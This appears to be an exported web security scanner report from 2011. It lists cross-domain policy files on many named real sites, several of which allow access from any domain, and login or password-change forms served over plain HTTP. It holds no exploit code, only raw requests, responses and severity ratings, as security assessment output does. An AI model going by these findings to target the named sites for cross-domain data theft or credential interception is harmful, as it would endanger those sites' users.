Confidence: | Certain |
Host: | http://www.tamu.edu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tamu.edu |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:03:47 GMT Server: Apache/2.2.10 (Linux/SUSE) Last-Modified: Wed, 15 Dec 2010 14:47:16 GMT ETag: "23-101-4977403682500" Accept-Ranges: bytes Content-Length: 257 Keep-Alive: timeout=15, max=55 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.tamu.edu" /> <allow-access-from domain="tamu.edu" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thisis50.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thisis50.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:10:20 GMT Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: xn_visitor=26f85903-1e9a Set-Cookie: ning_session=4w28PxsoeUA6 X-XN-Trace-Token: 5dc22b78-4420-49e1-b416 ETag: "7d09c-160-49d5e5d247680" Date: Sat, 02 Apr 2011 13:40:40 GMT Date: Sat, 02 Apr 2011 13:40:40 GMT Vary: X-XN_APPLICATION P3P: CP="UNI STA LOC CURa OURa COR ALL IND" Expires: Thu, 01 Jan 1970 00:00:00 GMT Expires: Fri, 02 Apr 2021 01:40:40 GMT Last-Modified: Mon, 28 Feb 2011 21:28:42 GMT CACHE-CONTROL: max-age=315576000 CACHE-CONTROL: no-cache="Set-Cookie" Content-Type: application/xml Accept-Ranges: bytes Server: Ning HTTP Server 2.0 Content-Length: 352 Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="static.ning.com"/> <allow-access-from domain="c2.static.ning.com"/> <allow-access-from domain="static.xna.ningops.net"/> <allow-access-from domain="c2.static.xna.ningops.net"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thomasnet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thomasnet.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:59:01 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14 Last-Modified: Fri, 07 Sep 2007 14:01:38 GMT ETag: "1856d0-1bc-13d87480" Accept-Ranges: bytes Content-Length: 444 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.tradekey.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tradekey.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:57:11 GMT Server: Apache Last-Modified: Sat, 04 Sep 2010 06:41:24 GMT Accept-Ranges: bytes Content-Length: 737 Vary: User-Agent Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="img.tradekey.com" /> <allow-access-from domain="img1.tradekey.com" /> <allow-access-from domain="img2.tradekey.com" /> <allow-access-from domain="www1.tradekey.com" /> <allow-access-from domain="ar.tradekey.com" /> <allow-access-from domain="cn.tradekey.com" /> <allow-access-from domain="es.tradekey.com" /> <allow-access-from domain="jp.tradekey.com" /> <allow-access-from domain="china.tradekey.com" /> <allow-access-from domain="int1.tkcdn.com" /> <allow-access-from domain="int2.tkcdn.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.umich.edu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.umich.edu |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:58:44 GMT Server: Apache Last-Modified: Fri, 04 Feb 2011 22:50:37 GMT ETag: "123f68-14d-49b7cb5e86940 Accept-Ranges: bytes Content-Length: 333 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="president.umich.edu" /> ...[SNIP]... <allow-access-from domain="umich.edu" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.verisign.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.verisign.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:06:35 GMT Server: Apache Set-Cookie: v1st=7CAA616EF17DECD4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT ETag: "28e9339-d5-49a38fa7a2e80 Accept-Ranges: bytes Content-Length: 213 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="cdn.verisign.com"/> </cross-d ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.vimeo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.vimeo.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:23:22 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 20:28:47 GMT ETag: "749ee-15f-e842fdc0" Accept-Ranges: bytes Content-Length: 351 Cache-Control: max-age=315360000 Expires: Tue, 30 Mar 2021 13:23:22 GMT Vary: Accept-Encoding Connection: close Content-Type: text/x-cross-domain <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="none"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.vistaprint.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.vistaprint.com |
HTTP/1.0 200 OK Content-Length: 92 Content-Type: text/xml Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT Accept-Ranges: bytes P3P: CP="VPRT " X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:31:15 GMT Connection: close Set-Cookie: v1st=409EF4DB2236D7BA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com <cross-domain-policy><allow-access-from domain="apps.ezprints.com"/></cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.walgreens.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.walgreens.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 06 Aug 2009 18:25:09 GMT Accept-Ranges: bytes Content-Length: 259 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:31:00 GMT Connection: close Set-Cookie: akaau=1301751960~id <cross-domain-policy> <allow-access-from domain="img.walgreens.com"/> <allow-access-from domain="images.walgreens.com"/> <allow-access-from domain="dnbdap01.walgreens.com"/> <allow-access-from domain="mymachine.walgreens.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.xe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.xe.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:50:24 GMT Server: Apache Set-Cookie: ID=173.193.214.243 Last-Modified: Fri, 05 Mar 2010 14:20:32 GMT ETag: "2d0006-d5-6b072c00" Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding,User Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="s.xe.com" /> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Sat, 02 Apr 2011 12:56:49 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Fri, 01 Apr 2011 13:36:57 GMT Expires: Fri, 01 Apr 2011 13:36:54 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 83994 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cbssports.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.cbssports.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:08 GMT Server: Apache Last-Modified: Tue, 10 Mar 2009 20:50:52 GMT Accept-Ranges: bytes Content-Length: 458 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 13:25:08 GMT X-Media: ws901-fe.tm Connection: close Content-Type: application/xml ...<?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from > <domain uri="*" /> <domain uri="http://*.akamai.net" /> <domain uri="http://*.g.akamai.net"/> <domain uri="http://beyond.download ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.coveritlive |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.coveritlive.com |
HTTP/1.0 200 OK Server: Apache/2.2.8 (Debian) PHP/5.2.5-3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8n Last-Modified: Wed, 21 Oct 2009 03:57:31 GMT ETag: "a7430f-145-47669fa5ec0c0 Accept-Ranges: bytes Content-Length: 325 Content-Type: application/xml X-Cache-Lookup: MISS from web2.cil:80 Date: Sat, 02 Apr 2011 13:56:28 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.intellicast.com |
HTTP/1.1 200 OK Content-Length: 337 Content-Type: text/xml Content-Location: http://www.intellicast Last-Modified: Thu, 11 Nov 2010 13:19:23 GMT Accept-Ranges: bytes ETag: "764b6fea381cb1:2092" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:06:22 GMT Connection: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nadaguides.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.nadaguides.com |
HTTP/1.1 200 OK Content-Length: 337 Content-Type: text/xml Last-Modified: Fri, 26 Mar 2010 16:16:58 GMT Accept-Ranges: bytes ETag: "0f92dc2ffccca1:55ba" Server: Microsoft-IIS/6.0 p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-NADAGuides: NY#3 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:51:58 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ncm.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.ncm.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT Accept-Ranges: bytes ETag: "072eca1eceacb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:35:56 GMT Connection: close Content-Length: 314 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> <r ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.opinionshere |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.opinionshere.com |
HTTP/1.1 200 OK Set-Cookie: opinions_here=a500240$50 Content-Type: text/xml Last-Modified: Wed, 04 Nov 2009 22:13:43 GMT Accept-Ranges: bytes ETag: "65455129c5dca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:01:37 GMT Connection: close Content-Length: 297 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> <resource path="/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.safelinkw |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.safelinkwireless.com |
HTTP/1.1 200 OK Connection: close Set-Cookie: ISAWPLB{4DECF60D-BA16 Content-Length: 337 Date: Sat, 02 Apr 2011 13:43:48 GMT Content-Type: text/xml ETag: "073fa486d98c91:0" Server: Microsoft-IIS/7.5 Accept-Ranges: bytes Last-Modified: Thu, 26 Feb 2009 23:52:30 GMT X-Powered-By: ASP.NET <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sat, 02 Apr 2011 13:32:43 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.winbuyer.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.winbuyer.com |
HTTP/1.1 200 OK Content-Length: 405 Content-Type: text/xml Last-Modified: Thu, 17 Feb 2011 10:42:46 GMT Accept-Ranges: bytes ETag: "3ed2eb698fcecb1:bc6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:41:52 GMT Connection: close ...<?xml version="1.0" encoding="utf-8" ?> - <access-policy> - <cross-domain-access> - <policy> - <allow-from http-request-headers="*"> <domain uri="*" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cbs.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.cbs.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 29 Sep 2009 19:09:25 GMT X-Real-Server: ws3224.drt.cbsig.net Content-Type: application/xml Cache-Control: max-age=299 Date: Sat, 02 Apr 2011 13:27:27 GMT Content-Length: 654 Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://cbs.com"/> <domain uri="http://*.cbs.com"/> <domain uri="http://*.bigspaceship.com"/> <domain uri="http://vsallaccess.com"/> <domain uri="http://*.vsallaccess.com"/> <domain uri="http://*.vsallaccess.com <domain uri="http://*.vsallaccess.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cnbc.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.cnbc.com |
HTTP/1.1 200 OK Content-Type: text/xml Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 13 Mar 2011 05:24:12 GMT Via: 1.1 C aicache6 Content-Length: 533 X-Aicache-OS: 207.46.150.45:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Sat, 02 Apr 2011 13:26:05 GMT ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://msnbc-ugc <domain uri="http://*.interactive <domain uri="http://*.msnbc.msn.com"/> <domain uri="https://*.msnbc.msn.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fidelity.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.fidelity.com |
HTTP/1.0 200 OK Server: FWS/7.0 P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" X-ua-compatible: IE=EmulateIE7 Content-Type: text/xml Last-Modified: Wed, 16 Feb 2011 22:16:37 GMT Content-Length: 449 ETag: "1c1-4d5c4cc5" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 13:32:33 GMT Connection: close Set-Cookie: MC=5LM7vGj3KIcaxyS0Z Set-Cookie: v1st=77844EBB51D035FB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com <?xml version="1.0" encoding="UTF-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*.fmr.com" /> <domain uri="https://*.fmr.com" /> <domain uri="http://*.fidelity.com" /> <domain uri="https://*.fidelity.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.indiatimes.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.indiatimes.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 23 Dec 2009 03:54:10 GMT ETag: "9d432e958383ca1:6ea" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 778 Cache-Control: max-age=259144 Date: Sat, 02 Apr 2011 14:02:49 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.indiatimes.com"/> </a ...[SNIP]... <domain uri="122.166.10.43" /> ...[SNIP]... <domain uri="http://121.243.172.93" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.msnbc.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.msnbc.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "04f15705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:46:08 GMT Connection: close Content-Length: 533 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://msnbc-ugc <domain uri="http://*.interactive <domain uri="http://*.msnbc.msn.com"/> <domain uri="https://*.msnbc.msn.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nationalg |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.nationalgeographic |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Accept-Ranges: bytes Content-Length: 408 Xonnection: Xeep-Alive Content-Type: text/xml X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80 Cache-Control: max-age=14400 Expires: Sat, 02 Apr 2011 17:27:37 GMT Date: Sat, 02 Apr 2011 13:27:37 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-methods="*"> <domain uri="http://*.stimulant.io"/> <domain uri="http://*.nationalgeo ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sky.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.sky.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Tue, 02 Dec 2008 19:48:26 GMT ETag: "c040-1a2-9c5ed680" Accept-Ranges: bytes Cache-Control: max-age=180 Expires: Sat, 02 Apr 2011 14:02:15 GMT Content-Type: text/xml Content-Length: 418 Date: Sat, 02 Apr 2011 13:59:15 GMT Connection: close ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*.sky.com"/> <domain uri="https://*.sky.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.xbox.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.xbox.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 25 Mar 2011 02:13:36 GMT Accept-Ranges: bytes ETag: "088663f92eacb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:36:21 GMT Connection: close Content-Length: 383 ...<?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="http://*.xbox.com" /> <domain uri="https://*.xbox.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kmart.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.kmart.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Fri, 17 Sep 2010 03:13:18 GMT Content-Type: text/xml Date: Sat, 02 Apr 2011 13:28:09 GMT Content-Length: 1917 Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://dfstaging <domain uri="https://dfstaging <domain uri="http://dfstaging.cloudapp <domain uri="https://dfstaging <domain uri="http://dfproduction <domain uri="https://dfproduction <domain uri="http://dfproduction <domain uri="https://dfproduction <domain uri="http://www.digitalfolio <domain uri="https://www.digitalfolio <domain uri="http://digitalfolio.com" /> <domain uri="https://digitalfolio.com" /> <domain uri="http://sears.digitalfolio <domain uri="https://sears.digita <domain uri="http://mstaging <domain uri="https://mstaging <domain uri="http://mstaging.cloudapp <domain uri="https://mstaging.cloudapp <domain uri="http://mproduction <domain uri="https://mproduction <domain uri="http://mproduction <domain uri="https://mproduction <domain uri="http://m.digitalfolio.com" /> <domain uri="https://m.digitalfolio <domain uri="http://sears.m.digit <domain uri="https://sears.m <domain uri="http://local.digitalfolio <domain uri="http://m.digitalfolio.com <domain uri="http://analytics <domain uri="https://analytics ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sears.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.sears.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Fri, 17 Sep 2010 03:13:24 GMT Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:23:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:23:34 GMT Content-Length: 1917 Connection: close s-srvr: <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://dfstaging <domain uri="https://dfstaging <domain uri="http://dfstaging.cloudapp <domain uri="https://dfstaging <domain uri="http://dfproduction <domain uri="https://dfproduction <domain uri="http://dfproduction <domain uri="https://dfproduction <domain uri="http://www.digitalfolio <domain uri="https://www.digitalfolio <domain uri="http://digitalfolio.com" /> <domain uri="https://digitalfolio.com" /> <domain uri="http://sears.digitalfolio <domain uri="https://sears.digita <domain uri="http://mstaging <domain uri="https://mstaging <domain uri="http://mstaging.cloudapp <domain uri="https://mstaging.cloudapp <domain uri="http://mproduction <domain uri="https://mproduction <domain uri="http://mproduction <domain uri="https://mproduction <domain uri="http://m.digitalfolio.com" /> <domain uri="https://m.digitalfolio <domain uri="http://sears.m.digit <domain uri="https://sears.m <domain uri="http://local.digitalfolio <domain uri="http://m.digitalfolio.com <domain uri="http://analytics <domain uri="https://analytics ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.usa.gov |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.usa.gov |
HTTP/1.0 200 OK Server: Apache ETag: "4e056cd0848e8725c51 Last-Modified: Thu, 22 Jul 2010 17:37:45 GMT Accept-Ranges: bytes Content-Length: 410 Content-Type: application/xml Date: Sat, 02 Apr 2011 14:06:11 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="http://prod.usa.gov"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.collegehumor.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:35:37 GMT Server: Apache X-Powered-By: PHP/5.3.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com Set-Cookie: jument_hash=2aaaf6d3 Set-Cookie: jument_hash=2aaaf6d3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </strong> <form id="frm_login" method="post" action="/"> <input type="text" class="text" name="login_email" id="login_email" /> <input type="password" class="text" name="login_password" id="login_password" /> <a href="/user/reset"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.popularsc |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.popularscreensavers Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:34:45 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Set-Cookie: JSESSIONID=9447E9A29 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 100956 ...[SNIP]... </div> <form name="changePassword" id="changePassword" action="/registration <input type="hidden" id="userName" name="account.userName" value="" /> ...[SNIP]... </label> <input class="inp-text" type="password" name="oldPassword" value="" /> </div> ...[SNIP]... </label> <input class="inp-text" type="password" name="newPassword" value="" /> </div> ...[SNIP]... </label> <input class="inp-text" type="password" name="confirmPassword" value="" /> </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.popularsc |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.popularscreensavers Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:34:45 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Set-Cookie: JSESSIONID=9447E9A29 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 100956 ...[SNIP]... </div> <form id="loginForm" name="loginForm" method="post" action="/registration <div class="login-email"> ...[SNIP]... <input type="text" name="" class="password-text form-input urchin" data-urchin="login_modal <input type="password" name="loginPassword" class="password form-input" id="modal-password" value="" /> </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.popularsc |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.popularscreensavers Accept: */* Proxy-Connection: Keep-Alive |
